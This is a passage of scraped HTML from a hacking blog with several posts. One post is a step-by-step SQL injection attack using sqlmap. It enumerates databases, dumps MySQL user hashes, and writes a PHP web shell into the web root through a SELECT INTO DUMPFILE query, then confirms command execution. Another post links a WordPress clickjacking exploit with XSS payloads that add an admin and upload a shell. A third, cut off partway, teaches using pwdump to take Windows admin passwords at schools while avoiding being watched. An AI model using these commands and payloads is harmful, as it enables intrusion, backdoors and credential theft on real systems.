<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">root@bt:/sqlmap# ./sqlmap.py -u “http://www.foo.org/index.php?” –data “option=com_aardvertiser&cat_name=user&task=view” -p cat_name –dbs
[03:18:19] [WARNING] POST parameter ‘cat_name’ is not injectable
[03:18:19] [CRITICAL] all parameters appear to be not injectable. Try to increase –level/–risk values to perform more tests. Rerun by providing either a valid –string or a valid –regexp, refer to the user’s manual for details
[*] shutting down at: 03:18:19</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<span id="more-2242" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span>All parameters appear to be not injectable, so we will set the appropriate values in level and risk arguments:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/09/02/from-sql-injection-to-backdoor-installation/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">root@bt:/sqlmap# ./sqlmap.py -u “http://www.foo.org/index.php?” –data “option=com_aardvertiser&cat_name=user&task=view” -p cat_name –dbs –level=5 –risk=3
[03:21:02] [INFO] checking if the injection point on POST parameter ‘cat_name’ is a false positive
POST parameter ‘cat_name’ is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 537 HTTP(s) requests:
—
Place: POST
Parameter: cat_name
Type: boolean-based blind
Title: OR boolean-based blind – WHERE or HAVING clause (MySQL comment)
Payload: option=com_aardvertiser&cat_name=-6470′ OR NOT (1875=1875)# &task=view
—
[03:21:22] [INFO] manual usage of POST payloads requires url encoding
[03:21:22] [INFO] testing MySQL
[03:21:22] [INFO] confirming MySQL
[03:21:23] [INFO] the back-end DBMS is MySQL
-
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[03:21:23] [INFO] fetching database names
[03:21:23] [INFO] fetching number of databases
[03:21:23] [WARNING] running in a single-thread mode. please consider usage of –threads option to declare higher number of threads
[03:21:23] [INFO] retrieved: 6
[03:21:24] [INFO] retrieved: information_schema
[03:21:54] [INFO] retrieved: cdcol
[03:22:03] [INFO] retrieved: joomla
[03:22:14] [INFO] retrieved: mysql
[03:22:23] [INFO] retrieved: phpmyadmin
[03:22:40] [INFO] retrieved: test
available databases [6]:
[*] cdcol
[*] information_schema
[*] joomla
[*] mysql
[*] phpmyadmin
[*] test
[03:22:48] [INFO] Fetched data logged to text files under ‘/sqlmap/output/www.foo.org′
[*] shutting down at: 03:22:48</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
It’s time to search for mysql users and dump their hashes:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/09/02/from-sql-injection-to-backdoor-installation/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">root@bt:/sqlmap# ./sqlmap.py -u “http://www.foo.org/index.php?” –data “option=com_aardvertiser&cat_name=user&task=view” -p cat_name –level=5 –risk=3 –users –password
[03:23:37] [WARNING] the testable parameter ‘cat_name’ you provided is not inside the Cookie
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
—
Place: POST
Parameter: cat_name
Type: boolean-based blind
Title: OR boolean-based blind – WHERE or HAVING clause (MySQL comment)
Payload: option=com_aardvertiser&cat_name=-6470′ OR NOT (1875=1875)# &task=view
—
[03:23:37] [INFO] manual usage of POST payloads requires url encoding
[03:23:37] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5
[03:23:37] [INFO] fetching database users
[03:23:37] [INFO] fetching number of database users
[03:23:37] [WARNING] running in a single-thread mode. please consider usage of –threads option to declare higher number of threads
[03:23:37] [INFO] retrieved: 5
[03:23:38] [INFO] retrieved: ‘root’@'localhost’
[03:24:06] [INFO] retrieved: ‘root’@'linux’
[03:24:28] [INFO] retrieved: ‘pma’@'localhost’
[03:24:54] [INFO] retrieved: ”@’localhost’
[03:25:16] [INFO] retrieved: ”@’linux’
database management system users [5]:
[*] ”@’linux’
[*] ”@’localhost’
[*] ‘pma’@'localhost’
[*] ‘root’@'linux’
[*] ‘root’@'localhost’
[03:25:33] [INFO] fetching database users password hashes
[03:25:33] [INFO] fetching database users
[03:25:33] [INFO] fetching number of password hashes for user ‘root’
[03:25:33] [INFO] retrieved: 1
[03:25:34] [INFO] fetching password hashes for user ‘root’
[03:25:34] [INFO] retrieved:
[03:25:35] [INFO] fetching number of password hashes for user ‘pma’
[03:25:35] [INFO] retrieved: 1
[03:25:37] [INFO] fetching password hashes for user ‘pma’
[03:25:37] [INFO] retrieved:
[03:25:38] [INFO] fetching number of password hashes for user ”
[03:25:38] [INFO] retrieved:
[03:25:39] [WARNING] unable to retrieve the number of password hashes for user ”
[03:25:39] [INFO] fetching number of password hashes for user ”
[03:25:39] [INFO] retrieved:
[03:25:39] [WARNING] unable to retrieve the number of password hashes for user ”
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[03:25:47] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net.
[03:25:47] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
password hash: NULL
[*] root [1]:
password hash: NULL
[03:25:47] [INFO] Fetched data logged to text files under ‘/sqlmap/output/www.foo.org′
[*] shutting down at: 03:25:47</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Excellent, as we can see mysql server has two users without password. Next step is try to access the database using phpmyadmin (without credentials).<br style="margin: 0px; padding: 0px;" />Using phpmyadmin web interface, we will try to find mysql’s datadir with the following sql query:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/09/02/from-sql-injection-to-backdoor-installation/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">select @@datadir;
/opt/lampp/var/mysql/</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
As we can see, the system uses xampp, and by default on xampp the web server’s directory is:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/09/02/from-sql-injection-to-backdoor-installation/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">/opt/lampp/htdocs/</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
After gathering all the appropriate information we are ready to create our php backdoor by using the following sql query:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/09/02/from-sql-injection-to-backdoor-installation/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">select “<?php system($_REQUEST['cmd']); ?>” into dumpfile ‘/opt/lampp/htdocs/cmd.php’ –;</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Let’s test our backdoor:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/09/02/from-sql-injection-to-backdoor-installation/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">http://www.foo.org/cmd.php?cmd=id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Voila!</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-84023032383836248232012-07-16T14:21:00.002+06:002012-07-16T14:21:36.739+06:00Clickjacking for Shells<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Andrew Horton (urbanadventurer) presented Clickjacking for Shells at the OWASP Wellington, New Zealand Chapter Meeting on September 20th, 2011 :</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="342" style="background-color: transparent; border: 0px; height: 390px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 561px;" width="561"><embed width="561" height="342" type="application/x-shockwave-flash" src="http://www.youtube.com/v/x4BrnSsrMg8?version=3" allowfullscreen="true" allowscriptaccess="always" style="margin: 0px; padding: 0px; height: 390px; width: 561px; "></object><br style="margin: 0px; padding: 0px;" /><span id="more-2164" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span></div>
<h3 style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 16px; line-height: 22px; margin: 0px 0px 5px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Exploit code</h3>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Security-Assessment.com WordPress Clickjacking Exploit.zip <a href="http://www.morningstarsecurity.com/downloads/Security-Assessment.com%20WordPress%20Clickjacking%20Exploit.zip" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Download</a></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">The ZIP file contains the following files:</strong><br style="margin: 0px; padding: 0px;" />clickjack.php – The final clickjacking exploit<br style="margin: 0px; padding: 0px;" />index-1.html – Tutorial 1 of how to exploit clickjacking<br style="margin: 0px; padding: 0px;" />index-2.html – Tutorial 2 of how to exploit clickjacking<br style="margin: 0px; padding: 0px;" />index-2-inner.html – Part of Tutorial 2<br style="margin: 0px; padding: 0px;" />README – Description<br style="margin: 0px; padding: 0px;" />wordpress-add-admin-payload.js – Cross Site Scripting (XSS) Payload<br style="margin: 0px; padding: 0px;" />wordpress-upload-shell-payload.js – Cross Site Scripting (XSS) Payload</div>
<h3 style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 16px; line-height: 22px; margin: 0px 0px 5px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Presentation</h3>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Clickjacking for Shells PDF (Without video demos) <a href="https://www.owasp.org/images/3/31/OWASP_NZ_SEP2011_Clickjacking-for-shells_PDF-version.pdf" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">Download</a></div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-16186689755900302702012-07-16T14:19:00.002+06:002012-07-16T14:19:49.089+06:00Decrypt administrator’s password using pwdump/fgdump<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Some times it necessary to know admin passwords in schools ,collages to log in with admin privileges to do various things. There are many way to crack passwords. But in this tutorial I will explain a very basic method using a single tool to crack windows password . This might come handy in places like schools ,collages where you cant use your live Linux cds , usb ..etc because your being watched</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Things we need :</strong></div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">1.</strong> <strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Pwdump</strong> or<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> Fgdump</strong> to extract password hashes</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
In this tutorial I will be using Pwdump</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Extracting Password hashes :-</strong></div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">1. </strong>Open My computer and go to<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> C:\Windows\system32</strong> . now place the<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> Pwdump file</strong> which we download earlier</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">2. </strong>Now open command prompt and navigate to<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> C:\Windows\system32 \</strong></div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Using c<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">d command</strong> and click enter</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Example :-</strong></div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/03/10/decrypt-administrators-password-using-pwdumpfgdump/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">Cd C:\Windows\system32\</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span id="more-986" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span></div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">3. </strong>Now you can see a list of Pwdump commands as shown</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
